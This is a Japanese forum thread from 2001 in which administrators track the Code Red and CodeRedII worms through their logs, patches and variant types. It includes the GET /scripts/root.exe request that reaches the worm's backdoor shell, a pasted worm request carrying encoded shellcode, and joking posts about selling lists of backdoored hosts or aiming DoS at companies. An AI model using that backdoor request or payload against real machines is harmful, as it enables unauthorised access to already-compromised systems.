管理者が何もしないという理由の場合も多いが、
たいていは古いままでも問題ないからだろ。

セキュリティホールがたまに発見されても、
IISみたいに致命的なものは非常に稀だ。
関係ないホールだったら、放置したって良いし。

最新パッチの追っかけをしなきゃいけないのは、
MSソフト全て,sendmail,DNS,wu-ftpd くらいなもの。

>>215 >>208
自分のIPも61で始まってませんか?

>>212
メールの覗き見だよ。

>>216
あー。BIND古いままだー。

>>218
なーるほど

>>214
検証しなきゃいけないようなクリティカルなサイトでは
Apacheだって同様に試験しなきゃいけないんでは?
mod_xxxxとかくっつけてると特に。
個人サイトとかならIISはパッチのexeファイルを実行して
再起動するだけなんだからラクチンでしょ

>> 221
どこが入れ替わるのかわかるので全部の試験はしないだよ。
（もちろん暇なおじさんが沢山いるならご自由に）

apache だってインストールはコマンド一発じゃん。
マシンの再起動だっていらん。

ちなみにウイルスの作者は死刑になるらしいぞ(藁
http://www.zdnet.co.jp/news/0107/25/e_coursey.html

>>217
208です。レンタルサーバーのIPが61のようです。

>>221-222
どっちだっていいよ。
いずれにせよパッチを充てない管理者はドキュソ。異議ある？

>> 222
mod_sslとかrpm版にはついてないっしょ
ついてるのあっても更新遅いし。
リコンパイルいるっすよ
ヘタしたらconfファイル書き直し。

自分と同じプロバイダのダイヤルアップマシンから来ちまったよ。
自宅マシンにサーバなんか立てないで、プロバイダから提供され
てるスペースを使えばいいのによー。

これだけ広まってしまったのって、ダイヤルアップする自宅マシン
に無防備にサーバを立ててしまうユーザが多いのが原因の一つ
だと思う。

XXXのダンプリスト。
http://www.incidents.org/diary/diary.php
CodeRedIIとの文字が読み取れるけど。だれか解読してみ。

>>221
Debianでaptをcronで回しておけばほぼ自動で最新のパッケージに
保てるからこっちの方が楽じゃない？　穴が見つかってもたいてい
1〜2日くらいでバグフィックスしたのが上がってくるっていうし。
自分はVineなのでちょとDebianがうらやましいナー。

ところでMSのパッチってあてた後再起動しなきゃダメなの？

>>225
激しく同意！何使ってようが管理者次第。
運用に金かけないDQN会社も多ければ、有能な人材不足も原因の一つ。

>>225
今回のCodeREDは管理者という意識のない
ダイアルアップユーザやADSLユーザがかなり多いように思います。
IP見てると。
IISインストールしたことさえ憶えてないとか、気づいてないとか。
そういうひとはセキュリティ関係のサイトなんか読まないから
CodeREDの存在自体しらないし、パッチって何?って感じでは?
せめてWindowsUpdateでパッチが当たるようにして欲しいっす。

>> 225

たしかにドキュソだね。

特に今回の件は、前もってずいぶん広報されてたのにね。

ひょっとして、
「ＭＳのパッチは完璧ではなく、特定の条件下でしか意味がない」
というオチだったら欝だね。

Exchange 2000 の時だって、３回くらい出し直したからね。
http://www.zdnet.co.jp/news/0106/14/e_patch.html

>>225
同意。IISだってメンテしているところは平気だし。
>>226
リコンパイルっていってもmake,make installで
済む話じゃないの？　つーか、tar玉拾ってきて
makeもできないヤツがUNIXの管理なんかするな。

>>229
Hotfix一つ当てるたびにいちいち再起動しなきゃダメなんす。
ぐはっ

http://www.jpcert.or.jp/at/2001/at010018.txt

>公開されているパッチは、Windows NT 4.0 の場合は Service Pack 6a、ま
>た Windows 2000 の場合は Service Pack 1 または Service Pack 2 に対する
>パッチです。したがってパッチを適用する前に、あらかじめ該当する Service
>Pack をシステムにインストールしておく必要があります。

> Service Pack のインストールが不可能もしくは極めて困難な場合は、一時
>的な対応策として、IIS における .ida および .idq のスクリプトマッピング
>を削除することをお勧めします。しかしこの対応方法では、関連するソフトウェ
>アをインストールすることでこの関連付けが復元されてしまうことがあります
>のでご注意ください。

>>233
Apacheのコンパイルもしたことないの?
ださっ

>>228
ざっと眺めただけでも怖いねー。
d:\inetpub\scripts\root.exe ってのが起動されるね。
こやつは何者なんだろ。

レジストリもいじってるみたいだね。こわー。

>> 237

バックドアで使用するルートキットだったりするんじゃないか。
CodeRedII（タイプX）では、感染したマシンをリモートから
操作できるそうだし。

>>236
Slackwareの頃はtar ball拾ってきてはがしがし
makeしてたけど、rpmを使うようになってからは
パッケージを拾って済ますほうが多いな。

もちろん必要ならsrc.rpmをいじってrebuildとか、
tar ballをmakeして/usr/localにぶち込むよ。
ダサイのは否定できないけどね。

あれ、関連情報全然でてない・・・・・・鬱だ

どーでもいいけど、ＯＳの張り合いはＯＳ板に逝ってね。
http://mentai.2ch.net/os/index2.html

>>228

>> 82 >>84 >>106に怪しげな記述はリストアップしてあるよ

/scripts に cmd.exe と root.exe がコピーされちゃうのかな？
んで、

% telnet <host> 80
GET /scripts/root.exe HTTP/1.0

でコマンドプロンプトが起動しちゃうわけか・・・
うー、こわひ・・・

>>244
ん？するとXXXなホストにtelnetするとrootに昇格？(藁
それは怖い。で？パスワードは？

rootって・・・

>>245
いや、こうなるらしいのでパスワードも何もあったもんじゃないかと。
-----------------------------------------------------
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 04 Aug 2001 20:35:19 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>
-----------------------------------------------------

>>247
ああ、>>228にばっちり書いてあるね。
俺の偽HTTPDの応答それに書き換えとこ（ｗ

>>167みたいなのが来た人はいないの？まあApacheのアクセスログ
だけじゃ、Cache-Control: max-stale=0 このヘッダが付いてるだけの
やつはわからないだろうけど、リクエストメソッド無しの奴は来てない？

スレのタイトルを「CodeRedIIは怖い！」に変更した方がいいな。（ﾆｶﾞﾜﾗ

まあ怖いっつーか、このスレにいる人間はIISなんか
使ってないから怖くないんだけどね。「アホ管理者が怖い！」
の方が的確だな。もしくは「FW厨が怖い！」

NNNタイプは本日11回
XXXタイプは本日119回
リクエストメソド無し 0回

>>249
来てるよ。１時間に１匹くらい。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=993901491&st=269&to=269&nofirst=true

>>252-253
サンクス。またでかいコピペで悪いんだけど（ログそのまま）

[Sun Aug 5 06:40:48 2001]
Access from h75-210-68-140.seed.net.tw(210.68.140.75) : 2327
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090
%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1
Host: 210.68.140.75
Connection: keep-alive
Content-type: text/xml
Content-length: 3379
Via: 1.0 nc (NetCache NetApp/5.1)
X-Forwarded-For: 210.68.177.194

こんなのも来てた。プロクシ経由かい

>>251
「DoSアタック期が本気で怖い！」の方がいいよ。

つまり今確認されてるXは、

・ノーマル
・Hostのところにアクセス先IP
・Hostのところにアクセス元IP、リクエストメソッド無し

の三種類かな。他の奴が来た人いる？下の2種類は数が
少ないからログにも残りにくいと思うけど

>>254
さりげなくそいつだけHTTP1.1だね

失敬。>>256の下二つは、リクエストヘッダに

Cache-Control: max-stale=0

が追加される。

＞Hostのところにアクセス先IP
２種類あるみたい。
律儀にHTTP/1.0の前のブランクを２つ→１つに修正してるのは同じ。
でもHTTP/1.0版とHTTP/1.1版の２種類を確認。
リクエストメソッド無しはまだ見た事無い。

>>259
ああ、そんなのがあるんだ。
ブランク2つは俺も気になってたよ（ｗ

日本の企業から大量に来てるんだけど知らせてやったほうがいいかな？
いっそ放って置くべき？どう思う？(藁

知らせられるなら知らせるべき、DoSアタック期が怖い

http://ton.2ch.net/test/read.cgi?bbs=sec&key=993901491&ls=50
で公開

>>262
じゃあ日本らしいIP列挙するからメールしてくれる？
ワシは日本語苦手だからパス。

>>264
自分でやれや

>>264
つーか列挙コピペもやめろ

XXXタイプのアタックをしてくるサイトは、Code Red2に感染しているわけ
だから、そのIPを2chにコピペすれば凄くマズイと思うけど。

Korea Network Information CenterのSUPER COMPUTERから６回きたよ
全然SUPERじゃないな（藁

ﾜﾗﾀ

code redセミナー。無料だとさ。誰か逝け。
http://www.nai.com/japan/seminar/codered.asp

>>270

> このウイルスについて「PCウイルスである」「メールを開いただけで感染」
> など、誤った情報が報道されている場合があります。本セミナーで、
> Code Red ウイルスとはどのようなウイルスであるか、正しい情報を
> 認識して下さい。

・・・まあ無料だろうな

日本ではマウンテンデュー code red 売らないのかな?
USではバカ売れらしいけど。

NNNの逆汗リスト。
http://www.eeye.com/html/advisories/codered.zip

>>261
自分の使っているプロバイダのほかのユーザからCode Redの
アタックを受けているっていうのをプロバイダのサポートに
連絡したら、ログファイルは警察やIPAに提出してくれないと
そのユーザに対して措置をとれないっていわれたよ。いいのか、
こんなんで＞プロバイダ

transnt.ylhcc.gov.tw - - [05/Aug/2001:10:49:46 +0900]
台湾政府機関？ X 型。

もっとマスコミに派手に騒いでもらわないと。
バックドア仕掛けられて好き放題されるよってこととか。
でもマスコミはそれをインターネット自体の悪い面として報道しちゃうんだろうな・・

>>274
そういうドキュソプロバイダの名前晒してくれ。

しまったスレ違い

しかし・・・確実にロバート・タッパン・モリスのワームも超えたな

>>274
俺もJ-COMにちくるつもりだけど、鯖禁止をうたっている
以上、そのユーザーに対して措置取らなかったら殺す。
つってもメールで注意ぐらいだろうな・・・アホJ-COMだし・・

code redうざいからってノートンとか黒氷切るのはやめたほうがいいよ
紛れて覗いてるやつもいるから
あー、しょーもな・・・

うーむ、どこのプロバイダもトップページにcode redについて
何にも記述してませんね。
意識低すぎ。
土日だから更新できないのかな?

>> 282

本当にノンキだよね。
プロバイダーもマスコミも。

しかし、hacked by Chinese!ってなってるページは見れないなあ。

>>284 そうだな、これだけ来てる割に 80 ポート叩いても何も起きん
IP ばっかなんだけど、どういうこと？

ワーム配付に忙しくて80に応答出来ないのでは？

一箇所から10回連続ってのがあった。
これも新種だろうか。

いくらなんでもモー少し騒然とした感じが伝わる報道があっていいと
思うんだが・・。マスコミの皆様今回は静かだなぁ。日曜だから
体勢が整わないってのもあるのかな？

実質的にはトラフィックが増えるってだけなんでそれほど重要視されてないのかな。

>>284
新種はWebページ変えないのでは?

>>287
うちにも連続１８回つーのがあったぞついさっき
１秒間に２〜６回きとる
こんなヤツが増殖したらかなわん。かんべんしてくれよぉ〜

XXXバージョンって頭固定って事はアジア限定なのかな。

IISをアンインストールしました(;´Д`)

なに気に静かになったな・・・

特定のipには来ないのか？

朝から何も来ないのですが・・・・

>>295
そのうち来るから、安心しろ！

>> 288

MS が圧力をかけて隠すって事は無いよね？
20世紀にはよくあった事だけど。

変種は期間限定らしいぞ。
24h 又は 48h の間繁殖した後、トロイ仕掛けて寝るんだとさ。

>> 292

うちにきているので、タイプＮ（CodeRedII）は、

61.XXX.XXX.XXX: 162回
62.XXX.XXX.XXX: 1回
208.XXX.XXX.XXX: 1回
210.XXX.XXX.XXX: 2回
211.XXX.XXX.XXX: 8回

おれの IP は、61.202.XXX.XXX です。

感染先を探すロジックが大幅にかわったらしい。

>>299
分かり難いから61.*.*.*って書いてね。

>>298
トロイっつーかバックドアね

これ読むよろし
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279

>>302
なるほど

送信元を探っていて改ざんされてるページ発見
http://210.96.220.7/

このバックドアの作り方だとsadmindと同じ方法で改ざんできちゃう
もんね。

俺んとこに来てるのは9割方210.x.x.xだよ。
消しても消しても警告が来る。まぁ鯖立てて無いから直接は無害なんだろうけど。

>>301
そのとうりっす。恥ずいな俺。
こんな時は、打つだし脳とか言わんといかんか？

既出かもしれないが

http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

鯖立ててるのは見よ！

>>307
「8月3日現在、Code Red に感染したという報告はＩＰＡには２件しかありません」
笑える。

>>308

だな

一応、駆除ソフト配ってるとこ貼っとくか・・・
直リン良くないかもしれんが、コンナ時だからな

http://www.symantec.com/region/jp/news/year01/010801_1.html

>304
改ざん内容がこれですか

sex0r lowd l33tn3ss

sex0r geeklab.org

contact:[email protected]

>>310
駆除するもなにも、リブートすれば消えるんでしょ？
リブートさえもしたくないときってこと？

>>311
そうです
IP書いたのはちょっと軽率でした。(反省）

>>313
でも駆除したってパッチ当てなきゃ無意味じゃん。
今日の状況だと再起動したら数分で再感染だぞ。
それにどうせパッチ当てたらリブート要るんじゃないの？

>312

Code Red ワームはメモリ上にのみ存在するので、再起動すると削除されます。
よって、現在のところ解析され確認されている Code Red に関する限り、 今回
の IIS の脆弱性に関する修正パッチを当てて再感染しないようにしてから再起
動すれば復旧できます。

但し、Code Red ワームが感染に利用するのと同じ IIS の脆弱性を利用して サ
ーバの不正操作をするプログラムも存在するため、ワームとは別件で 不正アクセ
スを受けていた可能性も否定できません。 よって、万全を期すならＯＳのクリー
ンインストールとフルバックアップからのリストアが必要です。

だってさ

Xが現れ始めたのは土曜の夜8時以降・・・
あきらかに時間帯も狙ったな

>>314
ごめん。>>310 の間違いだわ。

>> 312

少なくとも、最初のCodeRed（タイプＮ）は、
リブートすれば消えます。

CodeRedII（タイプＸ）については知らない。

もっとも、リブートして消えたって、未対策ならすぐに再感染する
からね。わからなかったら、Server を二度と起動しない事だよね。

>>304
亜種の亜種だな。

>>316
週末の間だけ猛烈に繁殖して、月曜の朝には何事も
なかったかのように sleep する。でもバックドアが開いている。
前回のより数倍凶悪だね。

20:02:03から20:03:00の間に、
cj3025086-a.sugnm1.kt.home.ne.jp(210.20.16.232)から
14回アクセス…

Xはリブートしても無駄じゃないかな。
レジストリになんかしてるみたいだし。

うちには、昨日117回、今日これまでに461回いらっしゃってます。
急速に広まってますな。

>>321
1分間に14か・・・凶悪すぎる

>>322
確かに。でも ntbugtraq の分析を信じるなら 24h
以内にリブートすれば被害を免れるか...
やっぱ再インストール推奨。

やっぱりダントツだな
http://www.incidents.org/

Port 13139に一分間で40連続アクセスされた。
これはcode redじゃないのかな？

>>327
ちゃいます。13139 ってのは新手のバックドアだろか？

どさくさにまぎれてノルウェーから80にポートスキャン。
この火事場泥棒！・・・泥棒じゃないか

コードレッド３が出たのかよ。

一見コードレッドに見えるapache向けワームとかあったらちと怖いかも。

バックドアから何かやってみたくなる厨房、、いるよなあ
Code Red�Uって、
「さあ、遊び場は用意したよ。思う存分遊べ！ 責任はとらんけどね、むひひ」
なんて悪魔の誘いっぽくない？

飯食いにいってる間にすごい勢いであがってるな・・・
さすが、code red

DNS: KILLER
Node: KILLER

なんてのが今し方来た
結構笑える名前付けてるの多いね
16BITとかPINKPANTHERとかRORIとか
みんなヲタクなんだな（藁

夕方頃に比べて、少しおとなしくなった?

日本からのアタックばっかだよ

ふぅ、ocnだのtikitikiだのzeroだのasahiネットだの

いろんな日本のユーザーからきてるよぉ

aDSLが入って喜んでサーバー開いたのはいいけれども
パッチ当てるって事は知らないのはマジで勘弁してほしい

Apacheにしろよ

>>334
うんにゃ、全然おとろえない。
予想ではこれから徐々に減るのかと思ってた。
考えてみると Code Red II が感染した時点から 24h
の間繁殖し続けて、再感染を防ぐ仕掛けは無いんだから、
パッチ当てない限り永遠に止まらんぞ。

211.167.93.132 - - [05/Aug/2001:19:55:35 +0900] "XX･･･　HTTP/1.0" 400 -


GETじゃない・・・なぜだ・・・
CodeRedIIIなのか？？

GETじゃないのとか　default.ida宛てじゃないのとか、
リザルトも　４００や４０４や４０８等いろいろあるでよ

Apacheも　本来は　「パッチだらけの」って意味なんだけどね。

ＩＩＳでActive-Perlとか入れたりＭＳ式で使うより、
Apache入れてhttpd.confの書き方だけ覚えるほうが
ラクだと思うんだがなあ・・・
Win32用のApacheがわかりにくいところにあるせいかなあ。

かなりの量の亜種があるような気がするのだが・・・
どうなんだろう。

こりゃしばらく続きそうだな。。

もうログ見てらんないほどになってきた・・・・

ほんとにお腹いっぱい >ログ

> http://japan.cnet.com/News/2001/Item/010804-5.html

>Code Redは主に、Windows NTおよびWindows 2000オペレーティング・
>システム(OS)と、マイクロソフトのウェブサーバー・ソフトウェア
>『インターネット・インフォメーション・サーバー』(IIS)を搭載し、
>ネットワークされた企業のコンピューターを攻撃する。

うんうん。

>ダイヤルアップでインターネットに接続している家庭のコンピュー
>ターが感染することはめったにない。

実際は、ダイアルアップ接続でも大量感染してんだYO.

>>339
でもなー、厨房にUNIX系OSは使って欲しくないんだよな。
IISのパッチさえあてられないヤツがまともにUNIXの面倒
なんて見られるわけないし。それこそSPAMの踏み台とか
にされそう。

統一スレッド立ててくれ。
こりゃ緊急対策本部が必要だな。

>>345
まったくっすね。
でも339さんはきっとWin用のApacheをWinに入れよう!とおっしゃってるのでは?

>> 345

たしかに。

でも踏台になるのは、どっちも一緒でしょう :(

BackOrifice だってあるし。

>>344
ほんとに認識が甘すぎる記事ですね。
実際、ダイアルアップマシンからの攻撃のほうが多いっしょ

>>344
> 実際は、ダイアルアップ接続でも大量感染してんだYO.

そうそう、うちもダイアルアップだけど、繋いで１０秒もしたら
感染するんだよ。（藁

しかし、ダイアルアップでIIS立ち上げてあるのかねえ。
なんか不思議。

アプリケーションによってはIISをいっしょにインストールするのもあるとか、ないとか。

>>352
あるとすれば、どんなソフト？

code redって凄くないか？
ある意味、今まで最強？

俺ダイアルアップでApacheです。最初はIISの存在自体知らなかった
んでAnHTTPd使ってました。

俺もAnHttpd使ってるけど、大丈夫だよね？

>>356
NT系＋IISのみ感染だから大丈夫でしょう。

>>357 ＋インデックスサービスだよ。

あー、自宅サーバ構築しようと思ってたのにログと 2ch 見てたら
終わってしまった。

今日一日のCode Redのとあるサーバへの来訪回数を一時間を
単位としてエクセルでグラフ化してみてるんだけど（暇
指数近時曲線で依然右肩上がり。。。
どこまで行く気だ。。。

どんどん感染してるんでしょうね。
企業が夏休みだったり、土日休日で。

企業はともかく普通のプロバイダらしい所からのアタックもかなり・・
そんなにサーバ立ててる人多いのか。

>>360
同じ事をやってるけど、家はそんなに増えてないなあ
どちらかというとダイアルアップユーザーが多そう
な時間に上がる。アドレスによって違うのかな？

ちなみに第一オクテット210で夕べの２０時から
6 6 9 7 11 8 3 5 6 8 6 8 6 10 8 7 6 9 10 24(15時）
10 12 15(19時） 10 12 19(22時）

それぞれ１時間あたりのＸタイプの回数です。

www.gachinko.ne.jp - - [05/Aug/2001:05:04:02 +0900] "GET /default.ida?XXXXXXXXXXX

こんな床から来たよ。
そういえばこの手のやつらレンタルサーバーとか追い出されたら
自宅サーバーにするだろな。
今日だけで５００以上ノックされてる。

>>363
うちは第一オクテット211です今朝午前一時台から
default.idaへのアクセスをひっかけて集計すると

24(1時) 16(2時) 17 21 11 31 29 23 18 14 16 25 26
19 17 21 26 20 22 57 40 22 50(23時44分まで）

こんな感じでまだ昇り調子です

>>364
code redだよ。

しかし、結構ＩＩＳって使われているんだなあって
変に感心しました。
一時期、企業はWINDOWS系のサーバでサービスしてるとかだと
会社の信用を落とすっていっていたのにな。

どうもＩＰの前半１６ビットがウチと同じ「ＩＰご近所さん」からのものが目立つ。
（２１１．１３０．ＸＸＸ．ＸＸＸ）
これってほとんどＯＣＮエコノミーだろうから、ＩＩＳもいっぱいいるんだろう。
２１１．１３０．以外のＯＣＮエコノミーからはちょぼちょぼ。
ご近所さんから手を広げて行く段取りになってると考えるのがやっぱ自然かなあ。

フレッツとかＣＡＴＶとかの人は、ＩＰご近所さんにＩＩＳが少ないだろうから
ＩＰご近所さんが多いとは感じにくいんじゃないだろうか。

あはは、英会話のECCからきたよ

>>367
http://www.netcraft.com/survey/
IISのShareはApacheの３分の１ですが。。。。それで、これだけ問題になって
いるのが不思議です。
＃不思議ではないけど。

>>367
それは大手の話じゃないかな。
１００人規模以下の中小じゃＵＮＩＸサーバ管理するために専属１人張りつけるのはむずかしいよ。
そういうところではたいていＮＴのパッケージでの運用が関の山だろう。
それでもまあＭＳのパッチをあてるくらいのことはしてほしいもんだが、
「ＩＰアドレスって何？」てな担当者しかいないようなネットワークがゴマンとあるのは現実。

>>200
ありがとうございます♪
そう説明して貰えるとなんとなくわかります。
よくある携帯の伝言ゲームみたいなヤツですね？
とりあえずZone入れてますが、よく来てちょっと怖くなったりしまして。

今は伝言ゲームで済んでても、その内サーバから一般のPC達へ
一斉攻撃とか・・・(;´Д`)？

今日一日のdefault.idaへのアクセス回数：576
ソースアドレスから重複を除いた回数　　：459

同じホストがなぜ重複して攻撃してくるのか良く分からん
けど、それにしても僕んとこ(211.XXX.XXX.XXX)だけでも
これだけクラッタ真里子ちゃんがいるんだから、全インターネット
だと、、、くわばらくわばら。。。バックドアで何遊ばれるやら

>>371
別にＵＮＩＸだと専属が必要で、ＷＩＮＤＷＯＳだと片手間で
ＯＫって事は、無いんだろうけどそういう宣伝をＭＳは
してるんで鵜呑みにして導入しちゃうんだろうなあ。

もう”GET /default.ida?XXXXXX･･･”ばっかりだよ。
ときどきNNNNNNが来るとホッとするね。

>>375
売るほうも「ＮＴならできますが、ＵＮＩＸはうちじゃちょっと」てなとこばっかだよ。
ＵＮＩＸ系で中小企業用パッケージってそうそうないだろ。
ＮＴならいっぱいある。

>>377
そういうベンダーとは付き合わないほうがいいと思われ・

>>378
そういうベンダーは週明け明日の始業時間から
電話鳴りっぱなしなんだだろうなあ。

まあ、実から出た錆ってことで、、、

>>378
ここにいる我々なんかは背景がわかるからそういう判断もできるけど、
ふつうの中小企業では何もわかってないからそういう判断にすらならないと思うよ。
売るほうも売るほうなら、買うほうも買うほう。
何がｅコマースだ（藁

『このページは、Microsoft の パーソナル Web サーバー で提供されています。
』

ってとこからも結構来るな〜。

そもそもはとっても簡単便利そうに見えるパッケージサーバなんかつくってる
メーカ（某日本の電気会社とか）がいちばん悪いと思われ

しかし、アタックにしてもこれだけ来ると、
なんだか嬉しい私はＭでしょうか？

これ全部がＷＷＷへの普通のアクセスならほんとに
嬉しいんだけどなあ。

win32のApacheってそんなに導入難しく無かったよ

IISのやり方を探すのに手こづったのでよっぽど楽だった


うーん、win32のApacheも別にセキュリティーには変わりないんですヨね？
ぁあ、ログがどんどんたまってくよ

>>374
うちの鯖と回数ほぼ一緒だ。

>>383
これは禿同です。
code red出る前はうちのログも２〜３しかなかったもの。

話し戻って、CodeRedのアタックって何時かは収まるのかな？
やられたというかやってる当事者は気づかないんじゃない
のこれ？
接続元のIPSとかに連絡してあげるべきなのかなあ？

せめてコバルトみたいのにしてくれればなあ。

どうも8月5日からFWログ上ではHTTPへのアクセスが急上昇ですな。
HTTPdなんか立ててないっつーの
9月5日と言えば、カンコックが教科書問題に抗議して一斉にアタックを予告してたが
これの事である可能性はどうよ？

>>387
ISP宛てメール爆弾状態になったりして。

>>388
御意

>>387
最初のうちはwhoisで調べて連絡あげたりしてたんだけど、
こうも増えるともう対処しきれねー（苦笑

>>387
ログがパンクしたら気が付くよ。

>>382
結局いちばん悪いのはＭＳ・・・

>>393
ログがパンクしても気づかない鴨・・・

>>390
そうかもね。

まあ、実際問題今のところ回線の誤差程度しかつかってない
し、うちの場合ルータで全部切ってるからほっておいても問題
ないんだけど、、、LOGは一杯になってしまいそう。まあ記念に
残しておくかな。

これってもしかしてウェブ鯖立ってたりすると、カウンター回りまくり？

何ヶ月もRoot宛のメールよんでないとこもあるくらいだからな．．．

code redと同時にNetbios Nameとりに来たのがあったけど、
これはまた別の新種だろうか。

>>395
LOG消して終わりだったりして、、

>>397 /default.ida がカウンタの CGI ならな (藁

>>396
backdoorありのサイトリストとすれば高く売れる

>>401
　それちょっと面白いな。

>>401
それやったら一気に人気サイトの仲間入りが出来るな。
誰かやって。

うちのサーバーのログみたら、１日に１０回以上きている。ほかのマシンも同じぐらい。
というか、攻撃先IPの選定にパターンがあるそうで、パターンにはまると、かなりのリクエストをうけるらしい。
つまり、DoS攻撃受けるようなもんだねぇ。最近そこらじゅうでISPとかでネットワークが落ちまくってるのもCode Redが原因らしい。

なんか下記のようなアドレスからちょくちょくアクセスあるのですが、
これ噂のCode Redなんでしょうか？
厨房な質問で申し訳ないです・・・

210.214.243.38 (TCP Port 2219) [TCP Flags: S]
210.85.136.239 (TCP Port 2041) [TCP Flags: S]
210.101.181.40 (TCP Port 4735) [TCP Flags: S]

ちなみにZoneAlarmで検出されたものです。

code redならport 80でしょ。

>>406
code redにまぎれて厨房がやってきてると思われ。

一日で200件を超えた･･･。
騒ぎに便乗して一つ質問なのですが警告の中で一つだけ毛色の違うものがあったのですけど
User: Administrator
Program: Internet Explorer
Time: 2001/08/06 0:26:14
↑こんなものが警告に出てくるのはなんですか？

皆さんは無事かな？
加入してるプロバイダーにpingも通りません（ｗ
今は多分、運良く書き込めてる
波があるみたいで、また　もうじき飲み込まれるよ
こういうプロバイダーは弱者で無能な訳だな

406です。
407さん、408さんありがとうございました。
こういうのはやはり放置しかないんでしょうね・・・

すみません･･･。
ぞぬスレと勘違いして書き込んでしまいました･･･鬱だ･･･。

61.127.109.53
ここから来たけどここが感染しているってことですか？

>>413
http://whois.nic.ad.jp/cgi-bin/whois_gw

特定のＩＳＰだけがトラフィック騰がってるみたいだけど
どういうことなの？
すいません、初心者です。

>>381
パーソナルＷｅｂサーバーってida処理するんだっけ？
もし新種がＩＩＳ本体の穴くぐってるんだったらまずい
よね。idaつかってるのはただのカモフラージュで・・・

XXXがポイントとか、ってことはないよね。

>>406
ぞぬのそれって相手のポートじゃ・・？

>>415
IISにパッチを当てられないけど、自分はWindowsの管理者だと思っている
厨房userの多いISP> 特定のISP

>>415
IPアドレスはランダムに選ばれるわけではなくて､
感染者のIPの近くのIPを選ぶからじゃない？

も　う　い　い　加　減　に　し　て　欲　し　い

うざくてかなわんよ

げいつ死ねば code red　も解決するよ

uranewsってＮＴ系鯖かな？
80叩いてた奴のホスト名逆引きしたら出てきたんだけど・・・
httpd立ち上げてる訳では無いのでcoderedかどうか分からない

>>418
そういう連中の中には、パッチをあてる以前に、そもそもＮＴに
パッチが効く前提のサービスパック６ａを当ててない輩がぞろぞろ
いると思われ。

code redでネットボランチも落ちる、、、
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html

オリジナルのCodeRedの場合、DoS攻撃のターゲットが特定
されていたけど、CodeRedIIの場合はどうなんだろうね。

狙う先は一緒なのです。前回は固定IPで狙ってたけど、
今度はホスト名からIP引いてDOSなんでしょ。

前回はIP変更で逃げたけど、今度は逃げられない。
ホワイトハウスはドメインを捨てるか？

どうせならマイクロソフトにDoS攻撃するようにしてほしかったな。

アカマイに泣いてもらうに一票。

>>428
ほんとに

>>428
　熱烈賛成

そろそろXは潜伏期に入るか？

>>423
相手がIISかどうかは、baka.htmlとかで404画面出せば判りますよ

逆引きしたらwww.gachinko.ne.jpから来ててIISだった（藁

夕方J-COM群馬に感染者一覧をログ添付して
メールしといたのに、返事来てない。まさかみんな
休んでんの？まさかね。

NANOGに流れてきた投稿だと、今回のX形はDoS Flooding能力は無いらしいっす。
ただバックドアを仕掛けていくだけ。後はそれを使って誰が何をやるか？
ってことかな

>>423
この板でも http://www.uranews.com/articles/tools/utoolc.gif を
引っ張ってくるのに時間かかってるのが気になるね。

うちはアクセス全然無くなった。潜伏？

>>435
　しかし、ワームを仕掛けたやつはどうやって仕掛けられたところを
　知るのかな。そのへんの仕掛けもあるんだろうか。

潜伏期までまだ３週間

>>439
いや、Xの話

Xの潜伏期

Xは土日活動してスリープするんじゃないの？

ウチはまだＸごんごん来てる。この１０分で２０件。
ひとつ発見。いつのまにか、全て　「２１１．Ｘ．Ｘ．Ｘ」だけになった。

Ｎはこなくなった。最後に来たのが５日２１：２４。

>>443
そうか、ごんごん来てるか。

＞２１１
インクリメントしたのかな（ｗ

>>428
　2chにスレを立てるCode Red改とか..

a163-159.dialup.iol.cz - - [06/Aug/2001:02:04:43 +0900] "GET /default.ida?NNN
十分前に来た。

Xが土日だけ活動するという情報のソースは？

うちは61.*.*.*だけど、全て61.*.*.*からになったよ
odn.ad.jp、hkcable.com.hk、HINET-IP.hinet.netとか

ソースっつーか、ただの噂だけど

>>298

広島、佐賀、沖縄、横浜、大阪、東京・・
色んなとこの同じISPから来たよ・・

IP を見る限り PPP で繋いでる奴多いから土日のテレホタイムが
活発に見えるだけだろう。

>>449
何処よ?

いまさらで悪いが、
なんか蚊取り線香の名前みたいだな。

>>450
それはあなたもＰＰＰで繋いでるテレホの人だからなのでは？

>>450
いや、そんなことは無いぞ

うちは61.xxxxだけど、
NNNに関しては、色々なIPから来る。(規則性は無い。）
XXXはほとんどが61.xxxから来るが、１例だけ198.142から来ていた。
つまり、
XXX (1) 同じNetworkを狙う
XXX (2) 違うNetworkに飛ぶ
XXX (3) 同じNetworkを狙う。 リクエストメソッド無し
の３種類があるような気がする。

>>167
>>254
>>256
>>258
>>259

Xのタイプについてはここら辺参照

うっ、アクセスなくなったかと思ったらやっぱりまだ来るな

>>446
噂じゃなくて詳細な分析出た
http://www.eeye.com/html/advisories/coderedII.zip
http://www.securityfocus.com/templates/archive.pike?list=1&mid=201886

>>458
おお、明日は会社で分析しよっと

じゃあ潜伏するのはあと何時間か先か

>>456
それ書いたの大体俺だけど、Cache-Control: max-stale=0
付きの奴は今日はまったく来なかったよ。

おっ、298ありがと

>>458 をざっと読んでみた。
感染したら一日（中国語版は二日）sleepするみたいだね。
あと、マシンを再起動してもバックドアと、explorer.exeにしかけ
られたﾄﾛｰｲは残ると書いてあるようだ。

バックドアだけじゃなくトロイまで・・・
どんなことするトロイなんだろ

なるほど、Explorerのトロイがある限り、root.exeを削除したり、
パッチを単に当てるだけじゃダメってことかな

>>464
う、すまん。読み違えたようだ。
感染すると /scripts/root.exe と、cドライブまたはｄドライブのルートに
explorer.exe が作られて、この root.exe と explorer.exe でバックドア
を実現しているようだ。
Worm自体はオリジナルと同様にメモリ上にしか存在しないから、再起動
すればWormは消える。しかし、root.exe と explorer.exe は残っているの
